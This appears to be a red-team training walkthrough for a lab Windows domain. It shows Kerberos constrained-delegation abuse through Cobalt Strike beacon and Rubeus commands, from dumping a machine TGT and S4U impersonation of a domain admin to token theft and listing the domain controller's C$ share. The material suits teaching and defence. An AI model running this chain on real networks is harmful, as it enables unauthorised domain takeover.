Constrained Delegation | What is this changing

Last updated 5 days ago

Constrained delegation was later introduced with Windows Server 2003 as a safer means for services to perform Kerberos delegation. It aims to restrict the services to which the server can act on behalf of a user. It no longer allows the server to cache the TGTs of other users, but allows it to request a TGS for another user with its own TGT.

In this case, SQL-2 can act on behalf of any user to the cifs service on DC-2. CIFS is quite powerful as it allows you to list file shares and transfer files. To find computers configured for constrained delegation, search for those whose msds-allowedtodelegateto attribute is not empty.

Constrained delegation can be configured on user accounts as well as computer accounts. Make sure you search for both.

To perform the delegation, we need the TGT of the principal (computer or user) trusted for delegation. The most direct way is to extract it with Rubeus dump:

You can also request one with Rubeus asktgt if you have NTLM or AES hashes.

With the TGT, perform an S4U request to obtain a usable TGS for CIFS on DC-2. Remember that we can impersonate any user in the domain, but we want someone who we know to be a local admin on the target. In this case, a domain admin makes the most sense.

This will perform an S4U2Self first and then an S4U2Proxy.

where:

Make sure to always use the FQDN. Otherwise, you will see 1326 errors.

Last updated 5 days ago

beacon> run hostname sql-2 beacon> getuid [*] You are NT AUTHORITY\SYSTEM (admin) beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage --------------------------------------------------------------------------------------------------------------- | LUID | UserName | Service | EndTime | --------------------------------------------------------------------------------------------------------------- | 0x3e4 | sql-2$ @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/6/2022 7:06:50 PM | beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap ServiceName : krbtgt/DEV.CYBERBOTIC.IO ServiceRealm : DEV.CYBERBOTIC.IO UserName : SQL-2$ UserRealm : DEV.CYBERBOTIC.IO StartTime : 9/6/2022 9:06:50 AM EndTime : 9/6/2022 7:06:50 PM RenewTill : 9/13/2022 9:06:50 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : 5TLxTvyC1fCy7KfNPHgYtzbBxmR3y2LAuWd7mAXEqAjC= Base64EncodedTicket : doIFpD[...]MuSU8=

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /ticket:doIFLD[...snip...]MuSU8= /nowrap [*] Action: S4U [*] Building S4U2self request for: 'SQL-2$@DEV.CYBERBOTIC.IO' [*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10) [*] Sending S4U2self request to 10.10.122.10:88 [+] S4U2self success! [*] Got a TGS for 'nlamb' to 'SQL-2$@DEV.CYBERBOTIC.IO' [*] base64(ticket.kirbi): doIFnD[...]FMLTIk [*] Impersonating user 'nlamb' to target SPN 'cifs/dc-2.dev.cyberbotic.io' [*] Building S4U2proxy request for service: 'cifs/dc-2.dev.cyberbotic.io' [*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10) [*] Sending S4U2proxy request to domain controller 10.10.122.10:88 [+] S4U2proxy success! [*] base64(ticket.kirbi) for SPN 'cifs/dc-2.dev.cyberbotic.io': doIGaD[...]ljLmlv

/impersonateuser is the user we want to impersonate. /msdsspn is the service principal name that SQL-2 is allowed to delegate to. /user is the principal allowed to perform the delegation. /ticket is the TGT for /user.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv [*] Using DEV\nlamb:FakePass [*] Showing process : False [*] Username : nlamb [*] Domain : DEV [*] Password : FakePass [+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9 [+] ProcessID : 5540 [+] Ticket successfully imported! [+] LUID : 0x3d3194 beacon> steal_token 5540 beacon> ls \\dc-2.dev.cyberbotic.io\c$ Size Type Last Modified Name ---- ---- ------------- ---- dir 08/15/2022 15:44:08 $Recycle.Bin dir 08/10/2022 04:55:17 $WinREAgent dir 08/10/2022 05:05:53 Boot dir 08/18/2021 23:34:55 Documents and Settings dir 08/19/2021 06:24:49 EFI dir 08/15/2022 16:09:55 inetpub dir 05/08/2021 08:20:24 PerfLogs dir 08/24/2022 10:51:51 Program Files dir 08/10/2022 04:06:16 Program Files (x86) dir 09/05/2022 17:17:48 ProgramData dir 08/15/2022 15:23:23 Recovery dir 08/16/2022 12:37:38 Shares dir 09/05/2022 12:03:43 System Volume Information dir 08/15/2022 15:24:39 Users dir 09/05/2022 17:09:56 Windows 427kb fil 08/10/2022 05:00:07 bootmgr 1b fil 05/08/2021 08:14:33 BOOTNXT 1kb fil 08/15/2022 16:16:13 dc-2.dev.cyberbotic.io_sub-ca.req 12kb fil 09/05/2022 07:25:58 DumpStack.log 12kb fil 09/06/2022 09:04:41 DumpStack.log.tmp 384mb fil 09/06/2022 09:04:41 pagefile.sys